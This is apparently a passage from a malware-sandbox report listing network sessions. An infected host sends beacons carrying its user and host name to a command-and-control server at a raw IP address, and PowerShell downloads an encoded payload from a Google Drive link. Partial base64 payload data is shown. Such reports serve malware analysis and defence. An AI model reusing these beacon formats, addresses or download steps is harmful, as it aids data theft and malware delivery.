                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:53.321681023 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:55.967161894 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:53 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:55.967178106 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:55.967189074 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination Port
                                28192.168.2.449769137.184.191.21580
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:56.114135981 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:56.119034052 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:58.721940041 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:56 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:58.721962929 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:58.721973896 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.449730142.250.185.2064436648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-09-30 08:02:50 UTC215OUTGET /uc?export=download&id=1nqjXMkuy0HQzk_iGcoAJbDrbsZjAvxAb HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: drive.google.com
                                Connection: Keep-Alive
                                2024-09-30 08:02:51 UTC1610INHTTP/1.1 303 See Other
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Mon, 30 Sep 2024 08:02:51 GMT
                                Location: https://drive.usercontent.google.com/download?id=1nqjXMkuy0HQzk_iGcoAJbDrbsZjAvxAb&export=download
                                Strict-Transport-Security: max-age=31536000
                                Content-Security-Policy: script-src 'nonce-26J6yK4fU_QTZHHUabJn3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Cross-Origin-Opener-Policy: same-origin
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.449731142.250.184.1934436648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-09-30 08:02:51 UTC233OUTGET /download?id=1nqjXMkuy0HQzk_iGcoAJbDrbsZjAvxAb&export=download HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: drive.usercontent.google.com
                                Connection: Keep-Alive
                                2024-09-30 08:02:54 UTC4855INHTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Content-Security-Policy: sandbox
                                Content-Security-Policy: default-src 'none'
                                Content-Security-Policy: frame-ancestors 'none'
                                X-Content-Security-Policy: sandbox
                                Cross-Origin-Opener-Policy: same-origin
                                Cross-Origin-Embedder-Policy: require-corp
                                Cross-Origin-Resource-Policy: same-site
                                X-Content-Type-Options: nosniff
                                Content-Disposition: attachment; filename="premedicate.cur"
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Credentials: false
                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                Accept-Ranges: bytes
                                Content-Length: 459596
                                Last-Modified: Mon, 30 Sep 2024 02:03:35 GMT
                                X-GUploader-UploadID: AD-8ljscEEkC16N-yr8wNO8-J_jnkUvW9xVJAbtQg25oDqNPDT_Lphfc_F-2SdvCuM2Nmcp9uws-3_GT_g
                                Date: Mon, 30 Sep 2024 08:02:54 GMT
                                Expires: Mon, 30 Sep 2024 08:02:54 GMT
                                Cache-Control: private, max-age=0
                                X-Goog-Hash: crc32c=aYbETg==
                                Server: UploadServer
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close
                                2024-09-30 08:02:54 UTC4855INData Raw: 63 51 47 62 36 77 4a 54 6e 62 73 35 77 41 6f 41 63 51 47 62 36 77 4b 51 6f 51 4e 63 4a 41 54 72 41 70 35 63 36 77 49 56 6e 37 6d 51 6c 46 52 57 36 77 4b 77 66 33 45 42 6d 34 48 70 76 4d 6e 6e 56 75 73 43 7a 2f 54 72 41 67 7a 45 67 66 48 55 79 6d 7a 2f 36 77 4a 47 4d 6e 45 42 6d 33 45 42 6d 2b 73 43 55 34 65 36 4e 37 5a 4b 4d 6e 45 42 6d 33 45 42 6d 2b 73 43 30 50 4c 72 41 71 50 48 4d 63 72 72 41 67 43 6d 36 77 4a 6e 42 49 6b 55 43 2b 73 43 57 38 4a 78 41 5a 76 52 34 75 73 43 7a 33 62 72 41 67 6c 79 67 38 45 45 63 51 47 62 36 77 4b 4a 6a 6f 48 35 68 36 4a 75 42 58 7a 49 36 77 4b 48 55 6e 45 42 6d 34 74 45 4a 41 54 72 41 72 72 65 63 51 47 62 69 63 4e 78 41 5a 76 72 41 6c 57 6d 67 63 4d 36 34 74 77 43 36 77 49 2f 75 33 45 42 6d 37 70 42 42 31 32 63 36 77 4c
                                Data Ascii: cQGb6wJTnbs5wAoAcQGb6wKQoQNcJATrAp5c6wIVn7mQlFRW6wKwf3EBm4HpvMnnVusCz/TrAgzEgfHUymz/6wJGMnEBm3EBm+sCU4e6N7ZKMnEBm3EBm+sC0PLrAqPHMcrrAgCm6wJnBIkUC+sCW8JxAZvR4usCz3brAglyg8EEcQGb6wKJjoH5h6JuBXzI6wKHUnEBm4tEJATrArrecQGbicNxAZvrAlWmgcM64twC6wI/u3EBm7pBB12c6wL
                                2024-09-30 08:02:54 UTC4855INData Raw: 61 6a 45 51 41 6d 57 61 33 51 49 67 47 72 75 78 70 54 75 41 6d 6c 76 7a 64 73 6f 71 34 54 4e 4f 76 53 76 56 59 53 44 62 7a 50 41 57 66 62 59 59 4c 62 2b 56 50 6e 70 79 50 4d 76 79 36 61 49 59 36 54 58 46 51 48 45 37 48 72 31 75 6f 43 6f 59 36 47 6d 70 30 41 45 37 33 73 33 49 47 74 59 37 53 50 78 46 64 69 75 65 6c 64 59 30 63 55 48 41 41 56 43 6d 65 65 72 75 63 48 46 4e 70 77 77 31 5a 52 71 61 52 4c 7a 53 73 49 75 4d 6d 38 77 35 43 52 76 72 46 44 42 61 6b 4d 70 6e 71 4f 31 79 62 6e 59 36 43 78 47 46 4a 68 6a 75 76 75 34 71 35 54 76 62 39 5a 54 51 65 68 67 76 75 35 65 63 4f 6e 36 69 4f 4b 63 59 6b 6d 76 45 45 52 78 33 65 46 50 5a 4d 4b 74 70 50 64 76 4b 37 43 46 69 6e 63 4e 74 43 72 4a 35 33 72 4a 4c 35 38 4c 7a 51 6c 37 38 6d 78 67 32 6f 69 63 64 62 76 64
                                Data Ascii: ajEQAmWa3QIgGruxpTuAmlvzdsoq4TNOvSvVYSDbzPAWfbYYLb+VPnpyPMvy6aIY6TXFQHE7Hr1uoCoY6Gmp0AE73s3IGtY7SPxFdiueldY0cUHAAVCmeerucHFNpww1ZRqaRLzSsIuMm8w5CRvrFDBakMpnqO1ybnY6CxGFJhjuvu4q5Tvb9ZTQehgvu5ecOn6iOKcYkmvEERx3eFPZMKtpPdvK7CFincNtCrJ53rJL58LzQl78mxg2oicdbvd
                                2024-09-30 08:02:54 UTC135INData Raw: 32 61 36 55 65 45 4f 77 59 4c 32 7a 36 73 70 62 44 30 45 55 67 49 66 45 53 50 6e 72 58 6f 72 68 5a 4a 39 5a 35 77 70 30 47 6a 73 4c 58 6f 57 4d 4a 43 4a 45 67 49 4a 52 62 6f 4e 37 58 6f 4a 30 51 66 59 55 67 49 61 6c 72 66 33 62 30 51 78 7a 39 73 4b 68 75 67 48 69 74 46 33 71 73 4d 4d 37 6b 6f 59 75 44 35 51 37 74 6d 4a 49 31 6c 49 32 43 30 70 74 42 69 4f 64 77 55 57 59 4c 6c 6c 70 69 2f 75 68 33 4f 4e
                                Data Ascii: 2a6UeEOwYL2z6spbD0EUgIfESPnrXorhZJ9Z5wp0GjsLXoWMJCJEgIJRboN7XoJ0QfYUgIalrf3b0Qxz9sKhugHitF3qsMM7koYuD5Q7tmJI1lI2C0ptBiOdwUWYLllpi/uh3ON
                                2024-09-30 08:02:54 UTC1322INData Raw: 41 63 32 65 6e 51 47 79 63 2f 63 51 56 44 4c 4e 46 5a 77 4d 61 63 6f 33 45 37 46 2f 32 68 36 73 6f 59 34 69 48 54 54 6d 55 37 31 64 50 34 58 48 49 59 67 72 30 67 68 4a 55 59 46 78 68 52 31 62 6a 4d 78 35 35 2f 68 66 2b 33 34 4b 6c 53 6d 2f 6c 44 53 67 42 51 63 2f 39 74 6e 69 39 68 4b 4c 76 33 70 46 46 2b 4c 6b 45 52 7a 41 38 62 4f 42 6f 76 4a 7a 7a 51 48 79 63 38 30 42 38 6e 50 4e 41 66 4a 7a 7a 51 48 79 63 38 30 42 38 6e 50 4e 41 64 5a 6e 5a 4b 43 4c 6c 32 48 6b 7a 75 79 6d 69 52 46 6d 65 66 74 54 48 69 68 52 31 55 5a 51 30 65 43 4c 62 32 43 70 63 34 30 42 30 42 4b 57 51 58 4a 7a 32 57 2b 6a 69 5a 69 30 55 67 6d 48 51 4c 6e 4a 37 58 32 63 2f 38 63 36 55 44 4f 61 38 36 67 30 59 58 44 55 39 76 76 4d 7a 2f 67 74 6b 43 6d 36 44 61 7a 73 75 4e 35 6c 63 67 58
                                Data Ascii: Ac2enQGyc/cQVDLNFZwMaco3E7F/2h6soY4iHTTmU71dP4XHIYgr0ghJUYFxhR1bjMx55/hf+34KlSm/lDSgBQc/9tni9hKLv3pFF+LkERzA8bOBovJzzQHyc80B8nPNAfJzzQHyc80B8nPNAdZnZKCLl2HkzuymiRFmeftTHihR1UZQ0eCLb2Cpc40B0BKWQXJz2W+jiZi0UgmHQLnJ7X2c/8c6UDOa86g0YXDU9vvMz/gtkCm6DazsuN5lcgX
                                2024-09-30 08:02:54 UTC1390INData Raw: 75 45 47 4f 66 34 53 78 35 72 41 50 50 62 4a 63 6d 61 70 55 4d 6e 6f 64 7a 41 77 34 68 46 63 2b 75 6c 64 68 73 51 49 63 71 31 33 73 33 52 51 39 7a 30 6d 77 6d 41 2f 47 4c 56 76 4c 62 6d 41 37 46 59 57 42 53 67 46 2b 59 64 71 37 31 4c 66 57 33 2f 6f 72 41 75 69 6c 63 79 7a 52 65 6b 35 2b 39 75 73 50 4e 4e 41 65 5a 64 32 77 45 53 70 6f 5a 4a 68 73 38 32 7a 49 77 4b 4c 6e 70 2f 42 69 6f 6b 46 37 69 4c 55 35 63 30 32 61 62 51 43 30 39 42 56 52 4b 35 48 44 50 63 65 6e 46 41 64 39 74 5a 61 55 68 65 55 37 63 64 73 5a 6f 73 64 5a 6f 64 56 44 51 36 46 42 4c 6d 65 69 46 53 2b 6b 6f 4d 2b 35 6b 49 6a 38 75 6c 63 4c 41 43 5a 65 4c 57 66 53 6d 54 49 59 2b 51 35 72 46 49 30 37 44 68 6d 41 6f 6e 4d 73 38 75 56 78 47 63 6b 49 56 64 57 38 44 37 6a 37 4a 77 54 47 31 36 74
                                Data Ascii: uEGOf4Sx5rAPPbJcmapUMnodzAw4hFc+uldhsQIcq13s3RQ9z0mwmA/GLVvLbmA7FYWBSgF+Ydq71LfW3/orAuilcyzRek5+9usPNNAeZd2wESpoZJhs82zIwKLnp/BiokF7iLU5c02abQC09BVRK5HDPcenFAd9tZaUheU7cdsZosdZodVDQ6FBLmeiFS+koM+5kIj8ulcLACZeLWfSmTIY+Q5rFI07DhmAonMs8uVxGckIVdW8D7j7JwTG16t
                                2024-09-30 08:02:54 UTC1390INData Raw: 63 41 31 46 75 72 50 4e 41 66 4a 7a 7a 51 48 79 63 38 30 42 38 6e 50 4e 41 66 4a 7a 7a 51 48 79 63 38 30 42 38 6c 50 66 70 35 70 2f 5a 37 59 6b 6c 6b 4e 79 77 78 30 37 70 7a 75 50 59 67 44 72 50 41 6d 6c 43 47 4d 6d 51 4d 55 66 65 31 2b 41 45 47 6c 55 45 54 58 5a 49 79 59 67 71 75 54 54 47 63 59 43 4f 6a 7a 53 75 49 63 68 37 4c 4c 6d 33 57 50 6e 31 71 2f 74 66 55 2f 51 7a 34 65 53 41 30 68 2b 46 6f 6c 74 66 56 63 37 67 65 43 53 43 56 72 4e 4e 51 65 76 52 58 2b 4f 38 6b 78 32 53 4c 4d 65 70 65 6f 5a 72 51 34 69 64 4a 6a 5a 30 32 47 73 64 48 76 35 49 59 77 4a 62 31 73 6c 41 67 38 58 74 6c 66 65 6a 55 65 54 51 74 73 50 33 6f 48 6c 75 36 56 76 30 72 56 41 77 4e 42 42 50 63 48 59 54 31 61 62 44 70 43 41 48 48 44 39 31 30 48 58 6d 47 4c 42 72 7a 6c 49 6e 34 56
                                Data Ascii: cA1FurPNAfJzzQHyc80B8nPNAfJzzQHyc80B8lPfp5p/Z7YklkNywx07pzuPYgDrPAmlCGMmQMUfe1+AEGlUETXZIyYgquTTGcYCOjzSuIch7LLm3WPn1q/tfU/Qz4eSA0h+FoltfVc7geCSCVrNNQevRX+O8kx2SLMepeoZrQ4idJjZ02GsdHv5IYwJb1slAg8XtlfejUeTQtsP3oHlu6Vv0rVAwNBBPcHYT1abDpCAHHD910HXmGLBrzlIn4V
                                2024-09-30 08:02:54 UTC1390INData Raw: 48 79 5a 2b 4d 59 69 47 4e 36 54 4b 51 6e 6b 4e 4b 2f 4c 7a 32 68 4c 58 36 5a 55 70 68 37 54 46 70 6f 43 30 46 6a 74 48 70 54 5a 32 72 71 6e 31 36 46 67 6c 4a 30 4f 69 5a 6a 39 57 77 4f 63 74 69 6b 69 73 46 77 50 30 51 32 4a 56 63 6d 67 55 4d 4a 33 66 34 52 49 4c 6b 6a 65 48 6d 7a 44 7a 42 37 45 2b 43 44 58 48 4c 38 46 39 33 37 46 4c 52 32 55 37 79 43 67 70 4f 47 56 5a 77 71 62 7a 65 36 6b 37 64 45 72 42 77 4e 49 59 49 2b 4b 76 68 46 55 59 6c 75 65 45 30 70 4c 77 6b 64 79 2b 41 61 47 68 53 6b 6b 73 4b 57 71 67 59 6e 75 31 58 59 72 30 6c 76 70 4e 41 32 6e 44 4c 4b 64 6f 77 69 56 56 46 66 6b 52 35 62 59 59 50 72 39 74 4e 33 5a 79 50 56 4c 63 7a 68 6f 59 36 6a 43 49 55 76 45 37 48 6b 39 4d 67 38 34 37 36 6c 35 33 6b 33 6b 69 70 2b 53 50 2f 6b 46 56 50 30 52
                                Data Ascii: HyZ+MYiGN6TKQnkNK/Lz2hLX6ZUph7TFpoC0FjtHpTZ2rqn16FglJ0OiZj9WwOctikisFwP0Q2JVcmgUMJ3f4RILkjeHmzDzB7E+CDXHL8F937FLR2U7yCgpOGVZwqbze6k7dErBwNIYI+KvhFUYlueE0pLwkdy+AaGhSkksKWqgYnu1XYr0lvpNA2nDLKdowiVVFfkR5bYYPr9tN3ZyPVLczhoY6jCIUvE7Hk9Mg8476l53k3kip+SP/kFVP0R
                                2024-09-30 08:02:54 UTC1390INData Raw: 66 6e 4c 33 44 6b 55 44 51 57 4f 50 77 75 70 39 47 51 68 57 4c 79 41 35 76 67 64 76 59 4a 41 7a 6a 51 48 51 42 39 6b 6a 45 78 47 4e 51 66 4a 6e 59 36 58 48 71 6d 78 68 6a 73 70 4e 32 64 54 54 73 5a 34 57 64 6f 65 68 6a 76 47 63 52 54 38 6e 36 69 4f 4b 63 59 6b 6d 71 2f 32 79 6e 66 45 79 63 44 43 51 67 62 65 6a 4a 56 6a 33 32 4b 41 48 37 39 55 71 56 42 2f 43 62 69 63 52 4f 31 41 35 79 75 44 30 79 36 56 7a 48 43 70 77 38 62 62 58 6d 78 68 38 41 78 75 6a 6b 52 31 4e 51 66 4a 52 74 56 57 51 6b 4b 4f 42 73 6e 50 4f 77 62 57 70 54 51 48 79 63 38 30 42 38 6e 50 4e 41 66 4a 7a 7a 51 48 79 63 38 30 42 38 6e 50 4e 41 66 4a 7a 36 58 53 4f 43 6e 53 74 68 68 6f 65 2b 4f 6c 6f 58 55 59 54 44 77 51 32 33 39 54 5a 68 62 74 72 72 46 4f 73 6b 61 78 70 73 6a 50 4e 49 34 52
                                Data Ascii: fnL3DkUDQWOPwup9GQhWLyA5vgdvYJAzjQHQB9kjExGNQfJnY6XHqmxhjspN2dTTsZ4WdoehjvGcRT8n6iOKcYkmq/2ynfEycDCQgbejJVj32KAH79UqVB/CbicRO1A5yuD0y6VzHCpw8bbXmxh8AxujkR1NQfJRtVWQkKOBsnPOwbWpTQHyc80B8nPNAfJzzQHyc80B8nPNAfJz6XSOCnSthhoe+OloXUYTDwQ239TZhbtrrFOskaxpsjPNI4R
                                2024-09-30 08:02:54 UTC1390INData Raw: 49 6a 64 69 73 2f 64 48 35 49 4f 71 4f 32 67 65 44 51 54 59 4d 32 6c 79 43 61 6b 65 5a 67 7a 39 77 35 55 6e 35 31 2b 39 41 78 35 49 6e 6e 66 77 32 4d 4c 39 4c 37 63 65 2f 42 70 74 31 71 4f 69 75 49 37 58 74 54 52 59 44 43 55 67 6c 56 30 44 6d 45 62 30 56 7a 55 51 54 6e 68 59 45 53 65 6f 41 36 74 7a 4f 39 41 68 70 71 69 38 77 59 71 4c 72 50 2f 55 33 77 68 4f 77 7a 35 7a 67 69 73 6d 54 6a 37 30 47 49 49 38 31 42 38 6b 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43
                                Data Ascii: Ijdis/dH5IOqO2geDQTYM2lyCakeZgz9w5Un51+9Ax5Innfw2ML9L7ce/Bpt1qOiuI7XtTRYDCUglV0DmEb0VzUQTnhYESeoA6tzO9Ahpqi8wYqLrP/U3whOwz5zgismTj70GII81B8kAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAAC
